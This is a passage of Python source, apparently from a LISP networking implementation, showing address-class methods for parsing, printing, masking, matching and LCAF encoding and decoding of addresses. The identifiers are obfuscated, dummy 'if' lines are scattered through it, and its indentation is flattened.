addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
self . address = int ( addr_str , 16 )
if 59 - 59: iIii1I11I1II1
elif ( self . is_geo_prefix ( ) ) :
I1Ii1i111I = lisp_geo ( None )
I1Ii1i111I . name = "geo-prefix-{}" . format ( I1Ii1i111I )
I1Ii1i111I . parse_geo_string ( addr_str )
self . address = I1Ii1i111I
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
i11II = int ( addr_str , 16 )
self . address = i11II
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
i11II = int ( addr_str , 16 )
self . address = i11II << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
self . mask_len = self . host_mask_len ( )
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
if 63 - 63: I11i
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
ooo = prefix_str . find ( "]" )
OO00O = len ( prefix_str [ ooo + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , OO00O = prefix_str . split ( "/" )
else :
i1i = prefix_str . find ( "'" )
if ( i1i == - 1 ) : return
O0ooOo0 = prefix_str . find ( "'" , i1i + 1 )
if ( O0ooOo0 == - 1 ) : return
OO00O = len ( prefix_str [ i1i + 1 : O0ooOo0 ] ) * 8
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( OO00O )
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
iI = ( 2 ** self . mask_len ) - 1
i1iiIiII1II1 = self . addr_length ( ) * 8 - self . mask_len
iI <<= i1iiIiII1II1
self . address &= iI
if 17 - 17: iIii1I11I1II1 - Ii1I + IiII . Oo0Ooo + i11iIiiIii
if 97 - 97: ooOoO0o % II111iiii / Ii1I . iIii1I11I1II1
def is_geo_string ( self , addr_str ) :
ooo = addr_str . find ( "]" )
if ( ooo != - 1 ) : addr_str = addr_str [ ooo + 1 : : ]
if 100 - 100: II111iiii / I11i * iIii1I11I1II1 / OOooOOo + i11iIiiIii - iIii1I11I1II1
I1Ii1i111I = addr_str . split ( "/" )
if ( len ( I1Ii1i111I ) == 2 ) :
if ( I1Ii1i111I [ 1 ] . isdigit ( ) == False ) : return ( False )
if 32 - 32: o0oOOo0O0Ooo - Ii1I / ooOoO0o % I1Ii111
I1Ii1i111I = I1Ii1i111I [ 0 ]
I1Ii1i111I = I1Ii1i111I . split ( "-" )
OOoo0Oo00 = len ( I1Ii1i111I )
if ( OOoo0Oo00 < 8 or OOoo0Oo00 > 9 ) : return ( False )
if 69 - 69: I1Ii111 % IiII - O0 % OoO0O00 - OoOoOO00 * i11iIiiIii
for OO0 in range ( 0 , OOoo0Oo00 ) :
if ( OO0 == 3 ) :
if ( I1Ii1i111I [ OO0 ] in [ "N" , "S" ] ) : continue
return ( False )
if 5 - 5: iII111i / oO0o * iIii1I11I1II1
if ( OO0 == 7 ) :
if ( I1Ii1i111I [ OO0 ] in [ "W" , "E" ] ) : continue
return ( False )
if 94 - 94: ooOoO0o / Ii1I
if ( I1Ii1i111I [ OO0 ] . isdigit ( ) == False ) : return ( False )
if 9 - 9: I1Ii111 * oO0o
return ( True )
if 44 - 44: ooOoO0o * oO0o
if 67 - 67: iIii1I11I1II1 . iIii1I11I1II1 + iIii1I11I1II1 * iII111i
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 70 - 70: I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 12 - 12: Oo0Ooo + I1IiiI
if 12 - 12: OoOoOO00 / II111iiii
def print_address ( self ) :
IiiIIi1 = self . print_address_no_iid ( )
o0OoO0000o = "[" + str ( self . instance_id )
for IiIIi1IiiIiI in self . iid_list : o0OoO0000o += "," + str ( IiIIi1IiiIiI )
o0OoO0000o += "]"
IiiIIi1 = "{}{}" . format ( o0OoO0000o , IiiIIi1 )
return ( IiiIIi1 )
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
if 28 - 28: I1IiiI
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
IiiIIi1 = self . address
IiIIIiIII1i = IiiIIi1 >> 24
iiI1i = ( IiiIIi1 >> 16 ) & 0xff
o0OOo0o0 = ( IiiIIi1 >> 8 ) & 0xff
iIII1i11i = IiiIIi1 & 0xff
return ( "{}.{}.{}.{}" . format ( IiIIIiIII1i , iiI1i , o0OOo0o0 , iIII1i11i ) )
elif ( self . is_ipv6 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 32 )
oo0o00OO = binascii . unhexlify ( oo0o00OO )
oo0o00OO = socket . inet_ntop ( socket . AF_INET6 , oo0o00OO )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 12 )
oo0o00OO = "{}-{}-{}" . format ( oo0o00OO [ 0 : 4 ] , oo0o00OO [ 4 : 8 ] ,
oo0o00OO [ 8 : 12 ] )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_e164 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( oo0o00OO ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 48 - 48: Ii1I / Ii1I / i1IIi * I1IiiI . iII111i + I1ii11iIi11i
return ( "unknown-afi:{}" . format ( self . afi ) )
if 66 - 66: iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
if 45 - 45: iII111i . oO0o * iII111i
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
iIII = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , iIII ) )
if 36 - 36: O0 - iII111i + I11i + I1IiiI
IiiIIi1 = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( IiiIIi1 )
if ( self . is_geo_prefix ( ) ) : return ( IiiIIi1 )
if 89 - 89: OoOoOO00 / Ii1I - OoO0O00 % I11i - oO0o . Ii1I
ooo = IiiIIi1 . find ( "no-address" )
if ( ooo == - 1 ) :
IiiIIi1 = "{}/{}" . format ( IiiIIi1 , str ( self . mask_len ) )
else :
IiiIIi1 = IiiIIi1 [ 0 : ooo ]
if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
return ( IiiIIi1 )
if 74 - 74: ooOoO0o
if 18 - 18: iIii1I11I1II1 - I11i - oO0o
def print_prefix_no_iid ( self ) :
IiiIIi1 = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( IiiIIi1 )
if ( self . is_geo_prefix ( ) ) : return ( IiiIIi1 )
return ( "{}/{}" . format ( IiiIIi1 , str ( self . mask_len ) ) )
if 12 - 12: O0 + O0 + ooOoO0o . I1IiiI * II111iiii
if 47 - 47: i11iIiiIii % OOooOOo / ooOoO0o . IiII - I1IiiI
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
IiiIIi1 = self . print_address ( )
ooo = IiiIIi1 . find ( "]" )
if ( ooo != - 1 ) : IiiIIi1 = IiiIIi1 [ ooo + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
IiiIIi1 = IiiIIi1 . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , IiiIIi1 ) )
if 10 - 10: Oo0Ooo / ooOoO0o / I1ii11iIi11i
return ( "{}-{}-{}" . format ( self . instance_id , IiiIIi1 , self . mask_len ) )
if 98 - 98: O0 - I1Ii111 - i11iIiiIii
if 85 - 85: II111iiii - I1ii11iIi11i % I1IiiI . I1IiiI - OoooooooOO - I11i
def print_sg ( self , g ) :
IiII1iiI = self . print_prefix ( )
Ii1I111 = IiII1iiI . find ( "]" ) + 1
g = g . print_prefix ( )
O0OO0O00Oo0 = g . find ( "]" ) + 1
II11I = "[{}]({}, {})" . format ( self . instance_id , IiII1iiI [ Ii1I111 : : ] , g [ O0OO0O00Oo0 : : ] )
return ( II11I )
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
def hash_address ( self , addr ) :
ooOo0O0 = self . address
ooo0 = addr . address
if 14 - 14: iIii1I11I1II1
if ( self . is_geo_prefix ( ) ) : ooOo0O0 = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : ooo0 = addr . address . print_geo ( )
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
if ( type ( ooOo0O0 ) == str ) :
ooOo0O0 = int ( binascii . hexlify ( ooOo0O0 [ 0 : 1 ] ) )
if 1 - 1: OoO0O00 - I1IiiI * o0oOOo0O0Ooo
if ( type ( ooo0 ) == str ) :
ooo0 = int ( binascii . hexlify ( ooo0 [ 0 : 1 ] ) )
if 84 - 84: OoO0O00 % OoooooooOO
return ( ooOo0O0 ^ ooo0 )
if 66 - 66: OoOoOO00 . iII111i
if 1 - 1: iII111i * i1IIi . iIii1I11I1II1 % O0 - OoooooooOO
if 87 - 87: iII111i . Oo0Ooo * i11iIiiIii % o0oOOo0O0Ooo + Ii1I
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
OO00O = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
OooO0o000Oo = 2 ** ( 32 - OO00O )
O00ooO00o0oO = prefix . instance_id
iIII = O00ooO00o0oO + OooO0o000Oo
return ( self . instance_id in range ( O00ooO00o0oO , iIII ) )
if 8 - 8: OOooOOo / Oo0Ooo + OoO0O00 + I1ii11iIi11i + OoooooooOO % i1IIi
if 46 - 46: OoOoOO00
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 75 - 75: I1IiiI
if 37 - 37: iIii1I11I1II1 % OoO0O00 * ooOoO0o + I11i % ooOoO0o / i11iIiiIii
if 14 - 14: i1IIi / ooOoO0o
if 10 - 10: ooOoO0o / OoooooooOO - ooOoO0o % O0 + oO0o - oO0o
if 16 - 16: O0
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
IiiIIi1 = self . address
I1iOoo0Ooo00o = prefix . address
if ( self . is_geo_prefix ( ) ) :
IiiIIi1 = self . address . print_geo ( )
I1iOoo0Ooo00o = prefix . address . print_geo ( )
if 78 - 78: OOooOOo % O0 * O0
if ( len ( IiiIIi1 ) < len ( I1iOoo0Ooo00o ) ) : return ( False )
return ( IiiIIi1 . find ( I1iOoo0Ooo00o ) == 0 )
if 62 - 62: ooOoO0o
if 77 - 77: I1IiiI . i11iIiiIii - I1ii11iIi11i
if 83 - 83: OoO0O00 - i11iIiiIii + I1ii11iIi11i - OOooOOo / OoOoOO00 / I11i
if 53 - 53: I11i * I1IiiI . I1IiiI / o0oOOo0O0Ooo - I1Ii111
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
if ( self . mask_len < OO00O ) : return ( False )
if 26 - 26: IiII . Ii1I
i1iiIiII1II1 = ( prefix . addr_length ( ) * 8 ) - OO00O
iI = ( 2 ** OO00O - 1 ) << i1iiIiII1II1
return ( ( self . address & iI ) == prefix . address )
if 35 - 35: I1ii11iIi11i + OOooOOo
if 88 - 88: O0
def mask_address ( self , mask_len ) :
i1iiIiII1II1 = ( self . addr_length ( ) * 8 ) - mask_len
iI = ( 2 ** mask_len - 1 ) << i1iiIiII1II1
self . address &= iI
if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
if 27 - 27: II111iiii - OoOoOO00
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
OO0OO0o0 = self . print_prefix ( )
iIi = prefix . print_prefix ( ) if prefix else ""
return ( OO0OO0o0 == iIi )
if 75 - 75: iIii1I11I1II1
if 72 - 72: Ii1I / i1IIi . o0oOOo0O0Ooo
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
Ii1iIiI1I = lisp_myrlocs [ 0 ]
if ( Ii1iIiI1I == None ) : return ( False )
Ii1iIiI1I = Ii1iIiI1I . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == Ii1iIiI1I )
if 15 - 15: iIii1I11I1II1 - OoooooooOO / ooOoO0o
if ( self . is_ipv6 ( ) ) :
Ii1iIiI1I = lisp_myrlocs [ 1 ]
if ( Ii1iIiI1I == None ) : return ( False )
Ii1iIiI1I = Ii1iIiI1I . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == Ii1iIiI1I )
if 83 - 83: IiII + I1Ii111 / OoOoOO00 * IiII . oO0o
return ( False )
if 22 - 22: O0 + ooOoO0o + I1Ii111
if 57 - 57: OOooOOo . ooOoO0o - OoooooooOO - I1ii11iIi11i * O0
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid == 0 and mask_len == 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 85 - 85: I1IiiI * OoO0O00
self . instance_id = iid
self . mask_len = mask_len
if 63 - 63: I1IiiI - i11iIiiIii
if 4 - 4: OOooOOo + iIii1I11I1II1 / I1IiiI * Ii1I
def lcaf_length ( self , lcaf_type ) :
IiiI1iii1iIiiI = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : IiiI1iii1iIiiI += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : IiiI1iii1iIiiI += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : IiiI1iii1iIiiI += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : IiiI1iii1iIiiI += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : IiiI1iii1iIiiI += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : IiiI1iii1iIiiI += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : IiiI1iii1iIiiI += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : IiiI1iii1iIiiI += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : IiiI1iii1iIiiI = IiiI1iii1iIiiI * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : IiiI1iii1iIiiI += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : IiiI1iii1iIiiI += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : IiiI1iii1iIiiI += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : IiiI1iii1iIiiI += 4
return ( IiiI1iii1iIiiI )
if 64 - 64: OoOoOO00
if 94 - 94: OOooOOo * OoooooooOO * o0oOOo0O0Ooo / I1Ii111 . II111iiii
if 37 - 37: O0 * II111iiii * I1IiiI - O0 - I11i / i1IIi
if 27 - 27: i11iIiiIii + iIii1I11I1II1
if 15 - 15: oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
if 41 - 41: OoooooooOO % I11i . O0 + I1Ii111
if 67 - 67: OoOoOO00 * OOooOOo / OOooOOo / OoooooooOO
if 67 - 67: I11i - i1IIi . OoooooooOO / iIii1I11I1II1
if 34 - 34: OoO0O00 * II111iiii
if 43 - 43: OoOoOO00 . I1IiiI
if 44 - 44: O0 / o0oOOo0O0Ooo
if 19 - 19: I11i
if 91 - 91: OOooOOo * OoooooooOO
if 89 - 89: i1IIi / iII111i . I1Ii111
def lcaf_encode_iid ( self ) :
iI1IIiI111iII = LISP_LCAF_INSTANCE_ID_TYPE
Iii1i11 = socket . htons ( self . lcaf_length ( iI1IIiI111iII ) )
o0OoO0000o = self . instance_id
O0ooo0 = self . afi
OOoOOO = 0
if ( O0ooo0 < 0 ) :
if ( self . afi == LISP_AFI_GEO_COORD ) :
O0ooo0 = LISP_AFI_LCAF
OOoOOO = 0
else :
O0ooo0 = 0
OOoOOO = self . mask_len
if 74 - 74: I1ii11iIi11i % iII111i / OoooooooOO / I1ii11iIi11i % i11iIiiIii % ooOoO0o
if 82 - 82: OoooooooOO . o0oOOo0O0Ooo * I1ii11iIi11i % I1ii11iIi11i * Ii1I
if 83 - 83: I11i - Oo0Ooo + i11iIiiIii - i11iIiiIii
o0oO00ooo0o = struct . pack ( "BBBBH" , 0 , 0 , iI1IIiI111iII , OOoOOO , Iii1i11 )
o0oO00ooo0o += struct . pack ( "IH" , socket . htonl ( o0OoO0000o ) , socket . htons ( O0ooo0 ) )
if ( O0ooo0 == 0 ) : return ( o0oO00ooo0o )
if 26 - 26: iII111i . i1IIi * OoOoOO00 + I1Ii111 . IiII % i11iIiiIii
if ( self . afi == LISP_AFI_GEO_COORD ) :
o0oO00ooo0o = o0oO00ooo0o [ 0 : - 2 ]
o0oO00ooo0o += self . address . encode_geo ( )
return ( o0oO00ooo0o )
if 98 - 98: I1IiiI - oO0o / i11iIiiIii % I1ii11iIi11i * oO0o * OoO0O00
if 74 - 74: I1Ii111 . I1ii11iIi11i - Ii1I * i11iIiiIii
o0oO00ooo0o += self . pack_address ( )
return ( o0oO00ooo0o )
if 36 - 36: II111iiii * Ii1I
if 53 - 53: Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo . Ii1I
def lcaf_decode_iid ( self , packet ) :
i1I1iii1I11II = "BBBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 79 - 79: Ii1I % O0 * OOooOOo
O0O , IIIi1i1iIIIi , iI1IIiI111iII , II1IIII1iII , IiiI1iii1iIiiI = struct . unpack ( i1I1iii1I11II ,
packet [ : Iiiii ] )
packet = packet [ Iiiii : : ]
if 24 - 24: oO0o
if ( iI1IIiI111iII != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
if 98 - 98: oO0o + iIii1I11I1II1 . ooOoO0o / I1ii11iIi11i
i1I1iii1I11II = "IH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 77 - 77: OoOoOO00 / Oo0Ooo * OoOoOO00 % I1IiiI . II111iiii % OoO0O00
o0OoO0000o , O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
packet = packet [ Iiiii : : ]
if 38 - 38: iII111i - OoO0O00 / i1IIi + ooOoO0o . ooOoO0o . iII111i
IiiI1iii1iIiiI = socket . ntohs ( IiiI1iii1iIiiI )
self . instance_id = socket . ntohl ( o0OoO0000o )
O0ooo0 = socket . ntohs ( O0ooo0 )
self . afi = O0ooo0
if ( II1IIII1iII != 0 and O0ooo0 == 0 ) : self . mask_len = II1IIII1iII
if ( O0ooo0 == 0 ) :
self . afi = LISP_AFI_IID_RANGE if II1IIII1iII else LISP_AFI_ULTIMATE_ROOT
if 37 - 37: iIii1I11I1II1 * OoOoOO00 . OoOoOO00 + OoooooooOO + OoO0O00
if 25 - 25: I1IiiI / IiII . OOooOOo . I1ii11iIi11i % i1IIi
if 12 - 12: O0 % O0
if 9 - 9: O0 . I1IiiI + I1ii11iIi11i / OOooOOo * I1ii11iIi11i
if 10 - 10: IiII % o0oOOo0O0Ooo / O0 / II111iiii
if ( O0ooo0 == 0 ) : return ( packet )
if 81 - 81: Ii1I / o0oOOo0O0Ooo % OoOoOO00 . I1ii11iIi11i
if 47 - 47: II111iiii + OOooOOo / II111iiii . OOooOOo
if 68 - 68: OoooooooOO
if 63 - 63: I1IiiI
if ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
return ( packet )
if 80 - 80: oO0o + iIii1I11I1II1
if 87 - 87: I1ii11iIi11i % Ii1I . Ii1I
if 71 - 71: OoO0O00 - IiII . i1IIi * I1IiiI % I11i
if 36 - 36: IiII * OoooooooOO . i11iIiiIii * i1IIi
if 52 - 52: IiII + ooOoO0o - II111iiii - OoooooooOO * OoO0O00 - iIii1I11I1II1
if ( O0ooo0 == LISP_AFI_LCAF ) :
i1I1iii1I11II = "BBBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 38 - 38: II111iiii % iIii1I11I1II1 * IiII * OoOoOO00 % II111iiii . I1IiiI
Ii1IiIIIi1i , II111Ii1I1I , iI1IIiI111iII , o00oo0oOo0o0 , oOOO0O000Oo = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 35 - 35: OoooooooOO - i11iIiiIii * i11iIiiIii % Ii1I - OOooOOo . iIii1I11I1II1
if 96 - 96: OOooOOo
if ( iI1IIiI111iII != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 18 - 18: oO0o . I1ii11iIi11i % oO0o
oOOO0O000Oo = socket . ntohs ( oOOO0O000Oo )
packet = packet [ Iiiii : : ]
if ( oOOO0O000Oo > len ( packet ) ) : return ( None )
if 43 - 43: oO0o / ooOoO0o . o0oOOo0O0Ooo . iIii1I11I1II1
I1Ii1i111I = lisp_geo ( "" )
self . afi = LISP_AFI_GEO_COORD
self . address = I1Ii1i111I
packet = I1Ii1i111I . decode_geo ( packet , oOOO0O000Oo , o00oo0oOo0o0 )
self . mask_len = self . host_mask_len ( )
return ( packet )
if 63 - 63: iII111i * iII111i
if 78 - 78: iIii1I11I1II1 % iIii1I11I1II1 . iIii1I11I1II1 / Ii1I . O0 + i1IIi
Iii1i11 = self . addr_length ( )
if ( len ( packet ) < Iii1i11 ) : return ( None )
if 53 - 53: Ii1I . I1ii11iIi11i - OOooOOo - ooOoO0o
packet = self . unpack_address ( packet )
return ( packet )
if 17 - 17: OoooooooOO / I1IiiI * ooOoO0o % I1ii11iIi11i . OoO0O00
if 5 - 5: OoO0O00 % I1Ii111 . oO0o . Ii1I + I1IiiI
if 95 - 95: II111iiii . iII111i - iIii1I11I1II1 / I11i + ooOoO0o * I1Ii111
if 92 - 92: iII111i * OoooooooOO % I1IiiI / OOooOOo
if 46 - 46: OoOoOO00
if 52 - 52: o0oOOo0O0Ooo - OoO0O00 % i1IIi / Ii1I % IiII
if 100 - 100: oO0o . i11iIiiIii - ooOoO0o
if 49 - 49: Oo0Ooo % ooOoO0o % o0oOOo0O0Ooo + ooOoO0o * I1Ii111 % I1IiiI
if 85 - 85: i1IIi / i1IIi
if 77 - 77: i1IIi . ooOoO0o % ooOoO0o - Ii1I
if 6 - 6: OOooOOo % Ii1I + ooOoO0o
if 17 - 17: iIii1I11I1II1 * I1Ii111 % oO0o + o0oOOo0O0Ooo . Ii1I * Oo0Ooo
if 16 - 16: I1IiiI % OoO0O00 . ooOoO0o / OoooooooOO
if 8 - 8: I1Ii111 % OoO0O00 . I1IiiI - OoOoOO00 + i1IIi / iIii1I11I1II1
if 89 - 89: II111iiii / Ii1I % Ii1I
if 57 - 57: I11i
if 95 - 95: OoOoOO00 + I11i * i1IIi - ooOoO0o % ooOoO0o
if 58 - 58: OOooOOo
if 74 - 74: i1IIi . IiII / ooOoO0o + I11i % i11iIiiIii % iII111i
if 62 - 62: i1IIi % I1Ii111
if 94 - 94: i1IIi + iII111i
def lcaf_encode_sg ( self , group ) :
iI1IIiI111iII = LISP_LCAF_MCAST_INFO_TYPE
o0OoO0000o = socket . htonl ( self . instance_id )
Iii1i11 = socket . htons ( self . lcaf_length ( iI1IIiI111iII ) )
o0oO00ooo0o = struct . pack ( "BBBBHIHBB" , 0 , 0 , iI1IIiI111iII , 0 , Iii1i11 , o0OoO0000o ,
0 , self . mask_len , group . mask_len )
if 25 - 25: I1Ii111 . Ii1I - Ii1I . o0oOOo0O0Ooo - IiII
o0oO00ooo0o += struct . pack ( "H" , socket . htons ( self . afi ) )
o0oO00ooo0o += self . pack_address ( )
o0oO00ooo0o += struct . pack ( "H" , socket . htons ( group . afi ) )
o0oO00ooo0o += group . pack_address ( )
return ( o0oO00ooo0o )
if 91 - 91: o0oOOo0O0Ooo % I1ii11iIi11i % OoOoOO00 * iIii1I11I1II1
if 18 - 18: OoOoOO00 * I1ii11iIi11i . i1IIi * iII111i
def lcaf_decode_sg ( self , packet ) :
i1I1iii1I11II = "BBBBHIHBB"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
if 67 - 67: IiII + i11iIiiIii . II111iiii / OoOoOO00 + OoooooooOO + i11iIiiIii
O0O , IIIi1i1iIIIi , iI1IIiI111iII , i1o00Oo , IiiI1iii1iIiiI , o0OoO0000o , iiIiIi , O000oooOoooo0 , iiiIiII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 31 - 31: OoooooooOO . I1Ii111 % OoooooooOO * iII111i % OOooOOo . iII111i
packet = packet [ Iiiii : : ]
if 17 - 17: I1Ii111 % i1IIi % I11i * O0 / Oo0Ooo
if ( iI1IIiI111iII != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
if 96 - 96: OoOoOO00 . Ii1I
self . instance_id = socket . ntohl ( o0OoO0000o )
IiiI1iii1iIiiI = socket . ntohs ( IiiI1iii1iIiiI ) - 8
if 80 - 80: OoOoOO00 + o0oOOo0O0Ooo - II111iiii
if 3 - 3: ooOoO0o * I1Ii111
if 34 - 34: Ii1I / Oo0Ooo . II111iiii - ooOoO0o - I1ii11iIi11i % OoOoOO00
if 43 - 43: Ii1I * oO0o
if 57 - 57: OoooooooOO + I1IiiI % I1ii11iIi11i % ooOoO0o * I1Ii111
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
if ( IiiI1iii1iIiiI < Iiiii ) : return ( [ None , None ] )
if 9 - 9: i11iIiiIii
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
IiiI1iii1iIiiI -= Iiiii
self . afi = socket . ntohs ( O0ooo0 )
self . mask_len = O000oooOoooo0
Iii1i11 = self . addr_length ( )
if ( IiiI1iii1iIiiI < Iii1i11 ) : return ( [ None , None ] )
if 85 - 85: IiII / o0oOOo0O0Ooo * ooOoO0o
packet = self . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 74 - 74: O0 - o0oOOo0O0Ooo
IiiI1iii1iIiiI -= Iii1i11
if 68 - 68: I1Ii111
if 19 - 19: o0oOOo0O0Ooo
if 63 - 63: OoooooooOO % ooOoO0o
if 26 - 26: OOooOOo + Oo0Ooo
if 97 - 97: I1Ii111 * I1Ii111 + iII111i % Ii1I / iII111i
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
if ( IiiI1iii1iIiiI < Iiiii ) : return ( [ None , None ] )
if 73 - 73: OoOoOO00 % I1Ii111 . I1ii11iIi11i
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
IiiI1iii1iIiiI -= Iiiii
IIi1iiIII11 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
IIi1iiIII11 . afi = socket . ntohs ( O0ooo0 )
IIi1iiIII11 . mask_len = iiiIiII
IIi1iiIII11 . instance_id = self . instance_id
Iii1i11 = self . addr_length ( )
if ( IiiI1iii1iIiiI < Iii1i11 ) : return ( [ None , None ] )
if 45 - 45: iIii1I11I1II1 % Ii1I . OoOoOO00 . o0oOOo0O0Ooo - OoooooooOO
packet = IIi1iiIII11 . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 46 - 46: I1ii11iIi11i
